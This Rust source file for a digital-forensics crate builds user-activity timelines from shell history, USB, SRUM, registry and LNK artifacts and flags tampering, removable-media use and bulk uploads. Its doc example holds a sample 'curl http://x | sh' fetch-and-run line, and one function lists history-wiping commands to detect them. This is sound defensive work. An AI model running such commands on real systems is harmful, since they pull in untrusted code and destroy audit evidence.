Skip to main content

useract_forensic/
lib.rs

1//! `useract-forensic` — the user-activity correlation layer.
2//!
3//! A thin **meta / orchestration** crate: it does not parse any raw format
4//! itself. It consumes already-decoded forensic reader types —
5//! [`shellhist_core::HistoryEntry`], [`peripheral_core::DeviceConnection`], SRUM
6//! records ([`srum_core`]), registry artifacts ([`winreg_artifacts`]), and Shell
7//! Link targets ([`lnk_core::ShellLink`]) — normalizes them into one uniform
8//! [`UserActivity`] event, builds a per-user timeline, and emits cross-source
9//! [`forensicnomicon::report::Finding`]s that no single source could produce alone.
10//!
11//! Every finding is an **observation** ("consistent with …"); the examiner draws
12//! the conclusions. MITRE techniques are narrated as consistency, never a verdict.
13//!
14//! ## 30-second example
15//!
16//! ```
17//! use useract_forensic::{build_timeline, audit, ShellHistorySource, DeviceSource};
18//! use shellhist_core::{HistoryEntry, Shell};
19//!
20//! // (sources are normally produced by the reader crates; constructed here inline)
21//! let entries = shellhist_core::parse_auto(b"#1700000000\ncurl http://x | sh\n", Some(".bash_history"));
22//! let shell = ShellHistorySource::new(&entries);
23//! let devices = DeviceSource::new(&[]);
24//!
25//! let timeline = build_timeline(&[&shell, &devices]);
26//! let findings = audit(&timeline);
27//! for f in &findings {
28//!     println!("{} — {}", f.code, f.note);
29//! }
30//! ```
31//!
32//! ## Sources
33//!
34//! Every source slots in behind the [`ActivitySource`] trait: shell history and
35//! peripheral devices (v0.1) plus SRUM (per-user app/network usage by SID — the
36//! first actor-attributing source), registry artifacts (UserAssist / TypedURLs /
37//! ShellBags), and recent-file LNK targets (carrying the volume serial that
38//! completes the device join). See `docs/roadmap.md` for the v0.3 sources.
39
40#![forbid(unsafe_code)]
41
42use forensicnomicon::report::{Category, ExternalRef, Finding, Severity, Source};
43use peripheral_core::{Bus, DeviceConnection};
44use shellhist_core::HistoryEntry;
45
46/// What a user did to a [`Subject`].
47#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
48pub enum Action {
49    /// Ran a program or command.
50    Executed,
51    /// Opened or read a file/folder.
52    Accessed,
53    /// Attached / connected a device.
54    Connected,
55    /// Issued a search query.
56    Searched,
57    /// Typed text (e.g. a typed URL / run-box entry).
58    Typed,
59    /// Disabled, cleared, or otherwise tampered with an activity record.
60    HistoryTampered,
61}
62
63/// The thing an [`Action`] was performed on.
64#[derive(Debug, Clone, PartialEq, Eq, Hash)]
65pub enum Subject {
66    /// A shell command or program invocation.
67    Command(String),
68    /// A file path, carrying the **volume serial** of the volume it lives on when
69    /// the source knows it (LNK `VolumeID`). The serial is the join key to a
70    /// [`Subject::Device`] with the same volume serial (see
71    /// [`device_file_volume_joins`]).
72    File {
73        /// The file path.
74        path: String,
75        /// NTFS/FAT volume serial of the file's volume, when known.
76        volume_serial: Option<u32>,
77    },
78    /// A folder path, carrying the **volume serial** of the volume it lives on when
79    /// the source knows it (shellbag / LNK directory target).
80    Folder {
81        /// The folder path.
82        path: String,
83        /// NTFS/FAT volume serial of the folder's volume, when known.
84        volume_serial: Option<u32>,
85    },
86    /// An external device, with its volume serial kept distinct so an LNK /
87    /// shellbag [`Subject::File`] carrying the same NTFS/FAT volume serial can be
88    /// joined to it (see [`device_file_volume_joins`]).
89    Device {
90        /// Device instance id (the stable primary key).
91        id: String,
92        /// NTFS/FAT volume serial of the device's volume, when known.
93        volume_serial: Option<u32>,
94    },
95    /// A search / lookup query.
96    Query(String),
97}
98
99impl Subject {
100    /// A file path with no known volume serial.
101    #[must_use]
102    pub fn file(path: impl Into<String>) -> Self {
103        Self::File {
104            path: path.into(),
105            volume_serial: None,
106        }
107    }
108
109    /// A folder path with no known volume serial.
110    #[must_use]
111    pub fn folder(path: impl Into<String>) -> Self {
112        Self::Folder {
113            path: path.into(),
114            volume_serial: None,
115        }
116    }
117}
118
119/// Which reader the activity was normalized from.
120///
121/// Extensible: marked `#[non_exhaustive]` so adding a variant is non-breaking;
122/// consumers must use a `_` arm when matching.
123#[non_exhaustive]
124#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
125pub enum SourceKind {
126    /// `shellhist-core` — shell command history.
127    ShellHistory,
128    /// `peripheral-core` — external-device connections.
129    PeripheralDevice,
130    /// `srum-core` / `srum-parser` — per-user app execution and network bytes,
131    /// attributed to a user SID (the first by-SID source).
132    Srum,
133    /// `winreg-artifacts` — registry per-user artifacts (UserAssist, TypedURLs,
134    /// ShellBags).
135    Registry,
136    /// `lnk-core` — Windows Shell Link (`.lnk`) targets, carrying the volume
137    /// serial that completes the device join.
138    LnkFile,
139}
140
141/// One normalized user-activity event: *who* did *what*, *when*, to *which* subject.
142#[derive(Debug, Clone, PartialEq, Eq)]
143pub struct UserActivity {
144    /// Unix epoch seconds, when the source records it. `None` when the source
145    /// carries no usable timestamp (e.g. plain bash / PowerShell PSReadLine).
146    pub timestamp: Option<i64>,
147    /// The acting user / SID, when the source attributes it. Most v0.1 sources do
148    /// not attribute a user; SRUM (v0.2) is the first by-SID source.
149    pub actor: Option<String>,
150    /// What was done.
151    pub action: Action,
152    /// What it was done to.
153    pub subject: Subject,
154    /// Which reader produced this event.
155    pub source: SourceKind,
156    /// A human-readable detail string for the event.
157    pub detail: String,
158}
159
160/// A producer of [`UserActivity`] events.
161///
162/// Implementing this trait is the v0.2 extension seam: a new reader wrapper
163/// (`lnk-core`, `shellbag-core`, `srum-core`, `winreg-artifacts`) implements
164/// `activities` and slots into [`build_timeline`] with no API change.
165pub trait ActivitySource {
166    /// The activities this source contributes to the timeline.
167    fn activities(&self) -> Vec<UserActivity>;
168}
169
170/// Does this shell command disable or clear command history?
171///
172/// Recognizes the common anti-forensic primitives across bash/zsh/PowerShell. The
173/// match is on structure (the verb + the well-known history target), not on a
174/// hardcoded full command line, so any member of the class is caught.
175fn is_history_tamper(cmd: &str) -> bool {
176    let c = cmd.to_ascii_lowercase();
177    let c = c.trim();
178    // bash/zsh: unset the history file, point it at the bit bucket, or clear it.
179    c.contains("unset histfile")
180        || c.contains("histfile=/dev/null")
181        || c.contains("histsize=0")
182        || c.contains("histfilesize=0")
183        || (c.contains("history") && (c.contains(" -c") || c.ends_with("-c")))
184        || c.contains("history -c")
185        // PowerShell PSReadLine history file removal.
186        || (c.contains("clear-history"))
187        || (c.contains("remove-item") && c.contains("consolehost_history"))
188        // Truncate/remove the history file directly.
189        || (c.contains("rm ") && c.contains(".bash_history"))
190        || (c.contains("rm ") && c.contains(".zsh_history"))
191        || (c.starts_with("> ") && c.contains("history"))
192}
193
194/// A [`ShellHistorySource`] wraps a borrowed slice of decoded history entries.
195///
196/// Each command becomes an [`Action::Executed`] [`UserActivity`]; a command that
197/// disables or clears history becomes an [`Action::HistoryTampered`] event instead
198/// (the clearing itself is the activity worth surfacing).
199pub struct ShellHistorySource<'a> {
200    entries: &'a [HistoryEntry],
201    actor: Option<String>,
202}
203
204impl<'a> ShellHistorySource<'a> {
205    /// Wrap decoded history entries with no attributed actor.
206    #[must_use]
207    pub fn new(entries: &'a [HistoryEntry]) -> Self {
208        Self {
209            entries,
210            actor: None,
211        }
212    }
213
214    /// Wrap decoded history entries, attributing them to a known user/account.
215    #[must_use]
216    pub fn for_actor(entries: &'a [HistoryEntry], actor: impl Into<String>) -> Self {
217        Self {
218            entries,
219            actor: Some(actor.into()),
220        }
221    }
222}
223
224impl ActivitySource for ShellHistorySource<'_> {
225    fn activities(&self) -> Vec<UserActivity> {
226        from_shell_history(self.entries, self.actor.as_deref())
227    }
228}
229
230/// Normalize a decoded shell-history stream into [`UserActivity`] events.
231///
232/// Each command → [`Action::Executed`]; a history-clearing command →
233/// [`Action::HistoryTampered`]. The `actor` (when known) is carried onto every
234/// event.
235#[must_use]
236pub fn from_shell_history(entries: &[HistoryEntry], actor: Option<&str>) -> Vec<UserActivity> {
237    entries
238        .iter()
239        .map(|e| {
240            let action = if is_history_tamper(&e.command) {
241                Action::HistoryTampered
242            } else {
243                Action::Executed
244            };
245            UserActivity {
246                timestamp: e.timestamp,
247                actor: actor.map(ToString::to_string),
248                action,
249                subject: Subject::Command(e.command.clone()),
250                source: SourceKind::ShellHistory,
251                detail: e.command.clone(),
252            }
253        })
254        .collect()
255}
256
257/// A [`DeviceSource`] wraps a borrowed slice of decoded device connections.
258///
259/// Each connection becomes an [`Action::Connected`] [`UserActivity`] whose
260/// [`Subject::Device`] carries the device instance id and the **volume serial**, so
261/// the v0.2 LNK/shellbag join can light up.
262pub struct DeviceSource<'a> {
263    connections: &'a [DeviceConnection],
264}
265
266impl<'a> DeviceSource<'a> {
267    /// Wrap decoded device connections.
268    #[must_use]
269    pub fn new(connections: &'a [DeviceConnection]) -> Self {
270        Self { connections }
271    }
272}
273
274impl ActivitySource for DeviceSource<'_> {
275    fn activities(&self) -> Vec<UserActivity> {
276        from_device_connections(self.connections)
277    }
278}
279
280/// Normalize a decoded device-connection stream into [`UserActivity`] events.
281///
282/// Each connection → [`Action::Connected`], carrying the device id and the volume
283/// serial. The timestamp is the device's first-install/first-seen stamp when the
284/// source recorded one.
285#[must_use]
286pub fn from_device_connections(connections: &[DeviceConnection]) -> Vec<UserActivity> {
287    connections
288        .iter()
289        .map(|c| {
290            let timestamp = c
291                .first_install
292                .or(c.last_arrival)
293                .or(c.last_install)
294                .map(|s| s.value);
295            UserActivity {
296                timestamp,
297                actor: None,
298                action: Action::Connected,
299                subject: Subject::Device {
300                    id: c.device_instance_id.clone(),
301                    volume_serial: c.volume_serial,
302                },
303                source: SourceKind::PeripheralDevice,
304                detail: c.device_instance_id.clone(),
305            }
306        })
307        .collect()
308}
309
310/// A [`SrumSource`] wraps borrowed SRUM network-usage and app-usage records plus
311/// the `SruDbIdMapTable` that resolves their integer `user_id` / `app_id` foreign
312/// keys to user SIDs and application paths.
313///
314/// SRUM is the first source that **attributes** activity to a specific user: each
315/// row becomes an [`Action::Executed`] [`UserActivity`] whose `actor` is the
316/// resolved user SID. Network rows additionally carry the per-interval byte volume
317/// in `detail`, sharpening the exfiltration lens.
318pub struct SrumSource<'a> {
319    network: &'a [srum_core::NetworkUsageRecord],
320    app_usage: &'a [srum_core::AppUsageRecord],
321    id_map: &'a [srum_core::IdMapEntry],
322}
323
324impl<'a> SrumSource<'a> {
325    /// Wrap decoded SRUM records with the id-map needed to resolve users and apps.
326    #[must_use]
327    pub fn new(
328        network: &'a [srum_core::NetworkUsageRecord],
329        app_usage: &'a [srum_core::AppUsageRecord],
330        id_map: &'a [srum_core::IdMapEntry],
331    ) -> Self {
332        Self {
333            network,
334            app_usage,
335            id_map,
336        }
337    }
338}
339
340impl ActivitySource for SrumSource<'_> {
341    fn activities(&self) -> Vec<UserActivity> {
342        from_srum(self.network, self.app_usage, self.id_map)
343    }
344}
345
346/// Resolve a SRUM integer id to its mapped name via the `SruDbIdMapTable`.
347///
348/// Returns `None` when the id is absent from the map — the caller substitutes a
349/// stable synthetic token so the foreign key is never silently dropped.
350fn resolve_id(id: i32, id_map: &[srum_core::IdMapEntry]) -> Option<String> {
351    id_map
352        .iter()
353        .find(|e| e.id == id)
354        .map(|e| e.name.clone())
355        .filter(|n| !n.is_empty())
356}
357
358/// Normalize SRUM network-usage and app-usage records into [`UserActivity`] events.
359///
360/// Each record → [`Action::Executed`], attributed to the user SID resolved from the
361/// id-map (falling back to a `user-id:<n>` token when unresolved). The application
362/// resolves to its path (falling back to `app-id:<n>`). Network rows carry their
363/// `<bytes_sent>↑ / <bytes_recv>↓ bytes` in `detail`; app-usage rows carry their
364/// foreground/background CPU cycles. The `DateTime<Utc>` timestamp becomes Unix
365/// epoch seconds.
366#[must_use]
367pub fn from_srum(
368    network: &[srum_core::NetworkUsageRecord],
369    app_usage: &[srum_core::AppUsageRecord],
370    id_map: &[srum_core::IdMapEntry],
371) -> Vec<UserActivity> {
372    let mut acts = Vec::with_capacity(network.len() + app_usage.len());
373
374    for r in network {
375        let actor =
376            resolve_id(r.user_id, id_map).unwrap_or_else(|| format!("user-id:{}", r.user_id));
377        let app = resolve_id(r.app_id, id_map).unwrap_or_else(|| format!("app-id:{}", r.app_id));
378        acts.push(UserActivity {
379            timestamp: Some(r.timestamp.timestamp()),
380            actor: Some(actor),
381            action: Action::Executed,
382            subject: Subject::Command(app),
383            source: SourceKind::Srum,
384            detail: format!(
385                "{}\u{2191} / {}\u{2193} bytes (SRUM network usage)",
386                r.bytes_sent, r.bytes_recv
387            ),
388        });
389    }
390
391    for r in app_usage {
392        let actor =
393            resolve_id(r.user_id, id_map).unwrap_or_else(|| format!("user-id:{}", r.user_id));
394        let app = resolve_id(r.app_id, id_map).unwrap_or_else(|| format!("app-id:{}", r.app_id));
395        acts.push(UserActivity {
396            timestamp: Some(r.timestamp.timestamp()),
397            actor: Some(actor),
398            action: Action::Executed,
399            subject: Subject::Command(app),
400            source: SourceKind::Srum,
401            detail: format!(
402                "{} foreground / {} background CPU cycles (SRUM app usage)",
403                r.foreground_cycles, r.background_cycles
404            ),
405        });
406    }
407
408    acts
409}
410
411/// A [`LnkSource`] wraps borrowed Windows Shell Link targets parsed by `lnk-core`.
412///
413/// Each [`ShellLink`](lnk_core::ShellLink) → an [`Action::Accessed`]
414/// [`Subject::File`] whose path is the link's local base path (or the network
415/// target's UNC name) and whose `volume_serial` is the `VolumeID`
416/// `DriveSerialNumber` — the structured key that completes the device join. The
417/// target's last-write FILETIME becomes the activity timestamp.
418pub struct LnkSource<'a> {
419    links: &'a [lnk_core::ShellLink],
420    actor: Option<String>,
421}
422
423impl<'a> LnkSource<'a> {
424    /// Wrap parsed shell links, attributing them to a user when known.
425    #[must_use]
426    pub fn new(links: &'a [lnk_core::ShellLink], actor: Option<&str>) -> Self {
427        Self {
428            links,
429            actor: actor.map(ToString::to_string),
430        }
431    }
432}
433
434impl ActivitySource for LnkSource<'_> {
435    fn activities(&self) -> Vec<UserActivity> {
436        from_lnk(self.links, self.actor.as_deref())
437    }
438}
439
440/// Normalize parsed Shell Links into [`Action::Accessed`] file [`UserActivity`]s.
441///
442/// Each link's target path comes from `link_info.local_base_path`; when that is
443/// absent, the `CommonNetworkRelativeLink` net name (a UNC share) is used. A link
444/// with no `LinkInfo` and no resolvable target is skipped rather than emitting a
445/// pathless event. The target's `write_time` FILETIME (already Unix epoch seconds,
446/// 0 = unset) becomes the timestamp; the `VolumeID` drive serial is carried on the
447/// [`Subject::File`] as the device-join key.
448#[must_use]
449pub fn from_lnk(links: &[lnk_core::ShellLink], actor: Option<&str>) -> Vec<UserActivity> {
450    links
451        .iter()
452        .filter_map(|link| {
453            let info = link.link_info.as_ref()?;
454            let path = info.local_base_path.clone().or_else(|| {
455                info.common_network_relative_link
456                    .as_ref()
457                    .and_then(|c| c.net_name.clone())
458            })?;
459            let volume_serial = info.volume_id.as_ref().map(|v| v.drive_serial_number);
460            // lnk-core already maps a zero "not set" FILETIME to 0 epoch seconds.
461            let timestamp = (link.header.write_time != 0).then_some(link.header.write_time);
462            Some(UserActivity {
463                timestamp,
464                actor: actor.map(ToString::to_string),
465                action: Action::Accessed,
466                subject: Subject::File {
467                    path: path.clone(),
468                    volume_serial,
469                },
470                source: SourceKind::LnkFile,
471                detail: format!("LNK target: {path}"),
472            })
473        })
474        .collect()
475}
476
477/// Parse an ISO-8601 `%Y-%m-%dT%H:%M:%SZ` UTC timestamp (the form
478/// `winreg-artifacts` emits) into Unix epoch seconds. Returns [`None`] for an
479/// absent or unparseable value — a missing timestamp is forensically meaningful,
480/// not an error.
481fn iso8601_to_epoch(s: Option<&str>) -> Option<i64> {
482    let s = s?;
483    chrono::DateTime::parse_from_rfc3339(s)
484        .ok()
485        .map(|dt| dt.timestamp())
486}
487
488/// A [`RegistrySource`] wraps borrowed per-user registry artifacts decoded by
489/// `winreg-artifacts` from an `NTUSER.DAT` / `USRCLASS.DAT` hive.
490///
491/// It normalizes the three published per-user artifacts:
492/// [`UserAssist`](winreg_artifacts::userassist) → [`Action::Executed`],
493/// [`TypedURLs`](winreg_artifacts::typed_urls) → [`Action::Typed`], and
494/// [`ShellBags`](winreg_artifacts::shellbags) → [`Action::Accessed`] (folder).
495///
496/// `winreg-artifacts` v0.1 publishes exactly these three per-user decoders; it has
497/// no separate RecentDocs / RunMRU / MountPoints2 / TypedPaths modules, so the
498/// adapter maps the artifacts that actually exist.
499pub struct RegistrySource<'a> {
500    userassist: &'a [winreg_artifacts::userassist::UserAssistEntry],
501    typed_urls: &'a [winreg_artifacts::typed_urls::TypedUrl],
502    shellbags: &'a [winreg_artifacts::shellbags::ShellbagEntry],
503    actor: Option<String>,
504}
505
506impl<'a> RegistrySource<'a> {
507    /// Wrap decoded registry artifacts, attributing them to a user when known (the
508    /// hive owner — the SID/account the `NTUSER.DAT` belongs to).
509    #[must_use]
510    pub fn new(
511        userassist: &'a [winreg_artifacts::userassist::UserAssistEntry],
512        typed_urls: &'a [winreg_artifacts::typed_urls::TypedUrl],
513        shellbags: &'a [winreg_artifacts::shellbags::ShellbagEntry],
514        actor: Option<&str>,
515    ) -> Self {
516        Self {
517            userassist,
518            typed_urls,
519            shellbags,
520            actor: actor.map(ToString::to_string),
521        }
522    }
523}
524
525impl ActivitySource for RegistrySource<'_> {
526    fn activities(&self) -> Vec<UserActivity> {
527        from_registry(
528            self.userassist,
529            self.typed_urls,
530            self.shellbags,
531            self.actor.as_deref(),
532        )
533    }
534}
535
536/// Normalize UserAssist entries into [`Action::Executed`] [`UserActivity`] events.
537///
538/// Each entry → an `Executed` activity whose subject is the program path; the run
539/// count is carried in `detail` and the ROT13-decoded last-run timestamp parsed to
540/// epoch. The `actor` (the hive owner) is carried when known.
541#[must_use]
542pub fn from_userassist(
543    entries: &[winreg_artifacts::userassist::UserAssistEntry],
544    actor: Option<&str>,
545) -> Vec<UserActivity> {
546    entries
547        .iter()
548        .map(|e| UserActivity {
549            timestamp: iso8601_to_epoch(e.last_run.as_deref()),
550            actor: actor.map(ToString::to_string),
551            action: Action::Executed,
552            subject: Subject::Command(e.program.clone()),
553            source: SourceKind::Registry,
554            detail: format!("UserAssist: {} run {} time(s)", e.program, e.run_count),
555        })
556        .collect()
557}
558
559/// Normalize IE/Edge TypedURLs into [`Action::Typed`] [`UserActivity`] events.
560///
561/// Each typed URL → a `Typed` activity carrying the URL as a [`Subject::Query`]
562/// (an address-bar entry is a typed lookup); the companion `TypedURLsTime`
563/// timestamp parsed to epoch.
564#[must_use]
565pub fn from_typed_urls(
566    urls: &[winreg_artifacts::typed_urls::TypedUrl],
567    actor: Option<&str>,
568) -> Vec<UserActivity> {
569    urls.iter()
570        .map(|u| {
571            let detail = match &u.suspicious_reason {
572                Some(reason) => format!("TypedURL: {} ({reason})", u.url),
573                None => format!("TypedURL: {}", u.url),
574            };
575            UserActivity {
576                timestamp: iso8601_to_epoch(u.last_visited.as_deref()),
577                actor: actor.map(ToString::to_string),
578                action: Action::Typed,
579                subject: Subject::Query(u.url.clone()),
580                source: SourceKind::Registry,
581                detail,
582            }
583        })
584        .collect()
585}
586
587/// Normalize ShellBags into [`Action::Accessed`] folder [`UserActivity`] events.
588///
589/// Each BagMRU entry → an `Accessed` activity whose [`Subject::Folder`] is the
590/// reconstructed folder path; the key's `LastWriteTime` parsed to epoch.
591#[must_use]
592pub fn from_shellbags(
593    bags: &[winreg_artifacts::shellbags::ShellbagEntry],
594    actor: Option<&str>,
595) -> Vec<UserActivity> {
596    bags.iter()
597        .map(|b| UserActivity {
598            timestamp: iso8601_to_epoch(b.last_written.as_deref()),
599            actor: actor.map(ToString::to_string),
600            action: Action::Accessed,
601            subject: Subject::folder(b.path.clone()),
602            source: SourceKind::Registry,
603            detail: format!("ShellBag {}: {}", b.key_path, b.path),
604        })
605        .collect()
606}
607
608/// Normalize all three per-user registry artifacts into one [`UserActivity`] stream.
609///
610/// Concatenates [`from_userassist`], [`from_typed_urls`], and [`from_shellbags`],
611/// attributing every event to the hive owner when known.
612#[must_use]
613pub fn from_registry(
614    userassist: &[winreg_artifacts::userassist::UserAssistEntry],
615    typed_urls: &[winreg_artifacts::typed_urls::TypedUrl],
616    shellbags: &[winreg_artifacts::shellbags::ShellbagEntry],
617    actor: Option<&str>,
618) -> Vec<UserActivity> {
619    let mut acts = from_userassist(userassist, actor);
620    acts.extend(from_typed_urls(typed_urls, actor));
621    acts.extend(from_shellbags(shellbags, actor));
622    acts
623}
624
625/// Merge any number of [`ActivitySource`]s into one timeline, sorted by timestamp.
626///
627/// Events with a timestamp come first in ascending epoch order; `None`-timestamp
628/// events are kept (their order is forensically meaningful too) and ordered stably
629/// at the end, preserving source/insertion order among themselves.
630#[must_use]
631pub fn build_timeline(sources: &[&dyn ActivitySource]) -> Vec<UserActivity> {
632    let mut events: Vec<UserActivity> = sources.iter().flat_map(|s| s.activities()).collect();
633    // Stable sort keeps None-timestamp events in source order; the key puts
634    // timestamped events first (ascending), untimestamped last.
635    events.sort_by_key(|e| (e.timestamp.is_none(), e.timestamp.unwrap_or(i64::MAX)));
636    events
637}
638
639/// The default temporal window (seconds) for the exec-during-removable-media join.
640///
641/// One hour: wide enough to catch a command run while a stick is mounted, tight
642/// enough to keep the temporal coincidence meaningful and the false-positive rate
643/// low.
644pub const REMOVABLE_MEDIA_WINDOW_SECS: i64 = 3600;
645
646/// The conservative per-interval `bytes_sent` threshold above which a SRUM network
647/// row is surfaced as a graded exfiltration **lead** (`USERACT-NETWORK-EXFIL-VOLUME`).
648///
649/// SRUM aggregates per process per ~1-hour interval. 256 MiB sent by a single
650/// process in one interval is well above routine background/telemetry traffic yet
651/// low enough to catch a deliberate bulk upload; it is a deliberately conservative
652/// lead, not a verdict — a backup client or large legitimate upload can also cross
653/// it, so the examiner adjudicates.
654pub const NETWORK_EXFIL_BYTES_THRESHOLD: u64 = 256 * 1024 * 1024;
655
656/// The [`Source`] stamp for findings this analyzer emits.
657#[must_use]
658pub fn source(scope: impl Into<String>) -> Source {
659    Source {
660        analyzer: "useract-forensic".to_string(),
661        scope: scope.into(),
662        version: Some(env!("CARGO_PKG_VERSION").to_string()),
663    }
664}
665
666/// Generic volume-serial join: pair every [`Subject::Device`] activity with every
667/// [`Subject::File`] / [`Subject::Folder`] activity that names the **same volume
668/// serial**.
669///
670/// Active in v0.2: a [`Subject::File`] / [`Subject::Folder`] carrying a
671/// `volume_serial` (from `lnk-core`'s `VolumeID`) joins to a [`Subject::Device`]
672/// connected with the same serial. Returns `(device_index, file_index)` pairs into
673/// `events`.
674///
675/// The volume serial is read first from the subject's structured `volume_serial`
676/// field; a `vol:<serial>` token in [`UserActivity::detail`] is honored as a
677/// fallback so an out-of-band source that only annotates the detail still joins.
678#[must_use]
679pub fn device_file_volume_joins(events: &[UserActivity]) -> Vec<(usize, usize)> {
680    let mut pairs = Vec::new();
681    for (di, dev) in events.iter().enumerate() {
682        let Subject::Device {
683            volume_serial: Some(dev_serial),
684            ..
685        } = &dev.subject
686        else {
687            continue;
688        };
689        for (fi, file) in events.iter().enumerate() {
690            if file_volume_serial(file) == Some(*dev_serial) {
691                pairs.push((di, fi));
692            }
693        }
694    }
695    pairs
696}
697
698/// Extract a file/folder activity's volume serial: the subject's structured
699/// `volume_serial` field, else a `vol:<serial>` token in its
700/// [`UserActivity::detail`]. Non-file subjects yield [`None`].
701fn file_volume_serial(activity: &UserActivity) -> Option<u32> {
702    let structured = match &activity.subject {
703        Subject::File { volume_serial, .. } | Subject::Folder { volume_serial, .. } => {
704            *volume_serial
705        }
706        _ => return None,
707    };
708    if structured.is_some() {
709        return structured;
710    }
711    for tok in activity.detail.split_whitespace() {
712        if let Some(rest) = tok.strip_prefix("vol:") {
713            if let Ok(serial) = rest.parse::<u32>() {
714                return Some(serial);
715            }
716        }
717    }
718    None
719}
720
721/// Audit a merged timeline for cross-source user-activity findings.
722///
723/// Emits hedged, low-false-positive observations achievable from the v0.1 sources:
724///
725/// - `USERACT-EXEC-DURING-REMOVABLE-MEDIA` — a shell command executed within
726///   [`REMOVABLE_MEDIA_WINDOW_SECS`] of a removable mass-storage device connection
727///   (temporal cross-source join). Consistent with activity involving external
728///   media (MITRE T1052 / T1091).
729/// - `USERACT-HISTORY-TAMPERED` — a history-clearing activity present in the
730///   timeline (re-surfaced at the user-activity layer; MITRE T1070.003).
731///
732/// Every finding is an observation, never a verdict.
733#[must_use]
734pub fn audit(events: &[UserActivity]) -> Vec<Finding> {
735    audit_with(events, &source("host"))
736}
737
738/// [`audit`] with a caller-supplied [`Source`] stamp (scope/version).
739#[must_use]
740pub fn audit_with(events: &[UserActivity], src: &Source) -> Vec<Finding> {
741    let mut findings = Vec::new();
742
743    // Removable mass-storage connection windows: (epoch, device id).
744    //
745    // Eligibility is derived structurally from the device instance id's leading
746    // enumerator token (`USBSTOR`, `USB`, `SD`, `SCSI`, …) via the published
747    // `peripheral_core::Bus` classifier — not a hardcoded device list — so any
748    // mass-storage member of the class qualifies and HID/Bluetooth/MTP devices do
749    // not.
750    let media_windows: Vec<(i64, &str)> = events
751        .iter()
752        .filter_map(|e| match (&e.action, &e.subject, e.timestamp) {
753            (Action::Connected, Subject::Device { id, .. }, Some(ts)) if is_mass_storage_id(id) => {
754                Some((ts, id.as_str()))
755            }
756            _ => None,
757        })
758        .collect();
759
760    // USERACT-FILE-ON-EXTERNAL-DEVICE — a file/folder accessed on a volume whose
761    // serial matches a connected external device (the volume-serial join).
762    for (di, fi) in device_file_volume_joins(events) {
763        findings.push(file_on_external_device_finding(
764            &events[di],
765            &events[fi],
766            src,
767        ));
768    }
769
770    for event in events {
771        // USERACT-HISTORY-TAMPERED — re-surface the clearing signal here.
772        if event.action == Action::HistoryTampered {
773            findings.push(history_tampered_finding(event, src));
774            continue;
775        }
776
777        // USERACT-NETWORK-EXFIL-VOLUME — a SRUM network row whose per-interval
778        // bytes_sent crosses the conservative threshold (graded lead, not a verdict).
779        if event.source == SourceKind::Srum {
780            if let Some(bytes_sent) = srum_network_bytes_sent(event) {
781                if bytes_sent >= NETWORK_EXFIL_BYTES_THRESHOLD {
782                    findings.push(network_exfil_volume_finding(event, bytes_sent, src));
783                }
784            }
785        }
786
787        // USERACT-EXEC-DURING-REMOVABLE-MEDIA — temporal cross-source join.
788        if let (Action::Executed, Some(ts), Subject::Command(cmd)) =
789            (event.action, event.timestamp, &event.subject)
790        {
791            if let Some((win_ts, dev_id)) = media_windows
792                .iter()
793                .find(|(dev_ts, _)| (ts - dev_ts).abs() <= REMOVABLE_MEDIA_WINDOW_SECS)
794            {
795                findings.push(exec_during_media_finding(cmd, ts, *win_ts, dev_id, src));
796            }
797        }
798    }
799
800    findings
801}
802
803/// Is this device instance id a removable mass-storage transport?
804///
805/// Classifies the leading enumerator token (the part before the first `\`) with the
806/// published [`peripheral_core::Bus`] classifier. A bare id with no separator is
807/// treated as its own enumerator. Structural, not a device allow-list.
808fn is_mass_storage_id(instance_id: &str) -> bool {
809    let enumerator = instance_id.split('\\').next().unwrap_or(instance_id);
810    Bus::from_enumerator(enumerator).is_mass_storage()
811}
812
813fn history_tampered_finding(event: &UserActivity, src: &Source) -> Finding {
814    let cmd = match &event.subject {
815        Subject::Command(c) => c.as_str(),
816        _ => event.detail.as_str(),
817    };
818    Finding::observation(
819        Severity::Medium,
820        Category::Concealment,
821        "USERACT-HISTORY-TAMPERED",
822    )
823    .source(src.clone())
824    .note(format!(
825        "user activity {cmd:?} disables or clears the activity record; consistent with \
826             anti-forensic history tampering (MITRE T1070.003)"
827    ))
828    .evidence("command", cmd.to_string())
829    .external_ref(ExternalRef::mitre_attack("T1070.003"))
830    .build()
831}
832
833fn exec_during_media_finding(
834    cmd: &str,
835    cmd_ts: i64,
836    dev_ts: i64,
837    dev_id: &str,
838    src: &Source,
839) -> Finding {
840    Finding::observation(
841        Severity::Low,
842        Category::Threat,
843        "USERACT-EXEC-DURING-REMOVABLE-MEDIA",
844    )
845    .source(src.clone())
846    .note(format!(
847        "the command {cmd:?} ran within {REMOVABLE_MEDIA_WINDOW_SECS}s of removable mass-storage \
848         device {dev_id:?} being connected; consistent with activity involving external media \
849         (MITRE T1052 / T1091)"
850    ))
851    .evidence("command", cmd.to_string())
852    .evidence("device", dev_id.to_string())
853    .evidence("command_epoch", cmd_ts.to_string())
854    .evidence("device_epoch", dev_ts.to_string())
855    .external_ref(ExternalRef::mitre_attack("T1052"))
856    .external_ref(ExternalRef::mitre_attack("T1091"))
857    .build()
858}
859
860/// Recover the `bytes_sent` value a SRUM network-usage activity advertises in its
861/// `detail` (the `<n>\u{2191} …` prefix [`from_srum`] writes). Returns `None` for
862/// any non-network SRUM activity (e.g. an app-usage row).
863fn srum_network_bytes_sent(activity: &UserActivity) -> Option<u64> {
864    let prefix = activity.detail.split('\u{2191}').next()?;
865    prefix.trim().parse::<u64>().ok()
866}
867
868fn network_exfil_volume_finding(event: &UserActivity, bytes_sent: u64, src: &Source) -> Finding {
869    let app = match &event.subject {
870        Subject::Command(c) => c.as_str(),
871        _ => event.detail.as_str(), // cov:unreachable: caller is a SRUM network row, always Subject::Command
872    };
873    let actor = event.actor.as_deref().unwrap_or("(unattributed)");
874    Finding::observation(
875        Severity::Medium,
876        Category::Threat,
877        "USERACT-NETWORK-EXFIL-VOLUME",
878    )
879    .source(src.clone())
880    .note(format!(
881        "SRUM records {bytes_sent} bytes sent in one interval by {app:?} attributed to user \
882         {actor:?}; the volume exceeds the {NETWORK_EXFIL_BYTES_THRESHOLD}-byte lead threshold and \
883         is consistent with bulk data exfiltration (MITRE T1048 / T1052) — a graded lead for the \
884         examiner, not a verdict"
885    ))
886    .evidence("application", app.to_string())
887    .evidence("actor", actor.to_string())
888    .evidence("bytes_sent", bytes_sent.to_string())
889    .external_ref(ExternalRef::mitre_attack("T1048"))
890    .external_ref(ExternalRef::mitre_attack("T1052"))
891    .build()
892}
893
